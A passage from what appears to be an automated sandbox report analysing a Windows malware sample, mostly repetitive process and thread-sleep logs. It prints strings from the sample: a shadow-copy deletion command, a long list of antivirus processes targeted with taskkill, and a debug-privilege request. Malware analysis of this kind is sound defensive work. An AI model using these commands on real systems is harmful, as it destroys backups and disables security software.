Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: eryy65ty.exe, 00000020.00000000.1772450953.000000000030B000.00000002.00000001.01000000.00000008.sdmp, eryy65ty.exe, 00000028.00000000.1925547868.000000000030B000.00000002.00000001.01000000.00000008.sdmp, eryy65ty.exe, 0000002B.00000000.2010314184.000000000030B000.00000002.00000001.01000000.00000008.sdmp, eryy65ty.exe.29.dr

Binary or memory string: COULD NOT CREATE CHILD PROCESSWOW64DISABLEWOW64FSREDIRECTIONKERNEL32.DLLWOW64REVERTWOW64FSREDIRECTIONABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ\WMIC.EXE\..\\WBEM\\SYSTEM32\\WINDOWS\C:\SHADOWCOPY DELETEAVPMAPP.EXE,ECONCEAL.EXE,SECHEALTHUI.EXE,RUNTIMEBROKER.EXE,ESCANMON.EXE,ESCANPRO.EXE,TRAYSSER.EXE,TRAYICOS.EXE,ECONSER.EXE,VIEWTCP.EXE,FSHDLL64.EXE,FSGK32.EXE,FSHOSTER32.EXE,FSMA32.EXE,FSORSP.EXE,FSSM32.EXE,FSM32.EXE,TRIGGER.EXE,FPROTTRAY.EXE,FPWIN.EXE,FPAVSERVER.EXE,AVK.EXE,GDBGINX64.EXE,AVKPROXY.EXE,GDSCAN.EXE,AVKWCTLX64.EXE,AVKSERVICE.EXE,AVKTRAY.EXE,GDKBFLTEXE32.EXE,GDSC.EXE,VIRUSUTILITIES.EXE,GUARDXSERVICE.EXE,GUARDXKICKOFF_X64.EXE,IPTRAY.EXE,FRESHCLAM.EXE,FRESHCLAMWRAP.EXE,K7RTSCAN.EXE,K7FWSRVC.EXE,K7PSSRVC.EXE,K7EMLPXY.EXE,K7TSECURITY.EXE,K7AVSCAN.EXE,K7CRVSVC.EXE,K7SYSMON.EXE,K7TSMAIN.EXE,K7TSMNGR.EXE,MPCMDRUN.EXE,NANOSVC.EXE,NANOAV.EXE,NNF.EXE,NVCSVC.EXE,NBROWSER.EXE,NSEUPDATESVC.EXE,NFSERVICE.EXE,CMD.EXETASKKILL/IMNWSCMON.EXE,NJEEVES2.EXE,NVCOD.EXE,NVOY.EXE,ZLHH.EXE,ZLH.EXE,NPROSEC.EXE,ZANDA.EXE,NS.EXE,ACS.EXE,OP_MON.EXE,PSANHOST.EXE,PSUAMAIN.EXE,PSUASERVICE.EXE,AGENTSVC.EXE,BDSSVC.EXE,EMLPROXY.EXE,OPSSVC.EXE,ONLINENT.EXE,QUHLPSVC.EXE,SAPISSVC.EXE,SCANNER.EXE,SCANWSCS.EXE,SCPROXYSRV.EXE,SCSECSVC.EXE,SUPERANTISPYWARE.EXE,SASCORE64.EXE,SSUPDATE64.EXE,SUPERDELETE.EXE,SASTASK.EXE,K7RTSCAN.EXE,K7FWSRVC.EXE,K7PSSRVC.EXE,K7EMLPXY.EXE,K7TSECURITY.EXE,K7AVSCAN.EXE,K7CRVSVC.EXE,K7SYSMON.EXE,K7TSMAIN.EXE,K7TSMNGR.EXE,UIWINMGR.EXE,UIWATCHDOG.EXE,UISEAGNT.EXE,PTWATCHDOG.EXE,PTSVCHOST.EXE,PTSESSIONAGENT.EXE,COREFRAMEWORKHOST.EXE,CORESERVICESHELL.EXE,UIUPDATETRAY.EXE,VIPREUI.EXE,SBAMSVC.EXE,SBAMTRAY.EXE,SBPIMSVC.EXE,BAVHM.EXE,BAVSVC.EXE,BAVTRAY.EXE,BAV.EXE,BAVWEBCLIENT.EXE,BAVUPDATER.EXE,MCSHIELDCCC.EXE,MCSHIELDRTM.EXE,MCSHIELDDS.EXE,MCS-UNINSTALL.EXE,SDSCAN.EXE,SDFSSVC.EXE,SDWELCOME.EXE,SDTRAY.EXE,UNTHREAT.EXE,UTSVC.EXE,FORTICLIENT.EXE,FCAPPDB.EXE,FCDBLOG.EXE,FCHELPER64.EXE,FMON.EXE,FORTIESNAC.EXE,FORTIPROXY.EXE,FORTISSLVPNDAEMON.EXE,FORTITRAY.EXE,FORTIFW.EXE,FORTICLIENT_DIAGNOSTIC_TOOL.EXE,AV_TASK.EXE,CERTREG.EXE,FILMSG.EXE,FILUP.EXE,FILWSCC.EXE,FILWSCC.EXE,PSVIEW.EXE,QUAMGR.EXE,QUAMGR.EXE,SCHMGR.EXE,SCHMGR.EXE,TWSSCAN.EXE,TWSSRV.EXE,USERREG.EXESEDEBUGPRIVILEGECOULD NOT SET SE_DEBUG_NAME PRIVILEGE

Uses ping.exe to sleep

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000

Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened / queried: D:\sources\replacementmanifests\microsoft-hyper-v-client-migration-replacement.man
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened / queried: D:\sources\replacementmanifests\microsoft-hyper-v-drivers-migration-replacement.man
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened / queried: D:\sources\replacementmanifests\microsoft-hyper-v-migration-replacement.man

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5468	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4345	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3374	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1382	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5055	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2743	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7902
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 741
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5663
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4102

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\fjeljies.cpl

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8176	Thread sleep count: 3374 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8176	Thread sleep count: 1382 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7184	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6052	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512	Thread sleep count: 5055 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1404	Thread sleep time: -21213755684765971s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5084	Thread sleep count: 2743 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8052	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4908	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1244	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2624	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7772	Thread sleep count: 7902 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2376	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7772	Thread sleep count: 741 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7764	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8488	Thread sleep count: 5663 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8488	Thread sleep count: 4102 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8520	Thread sleep time: -23058430092136925s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8544	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe TID: 8664	Thread sleep count: 46 > 30
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe TID: 8664	Thread sleep count: 36 > 30
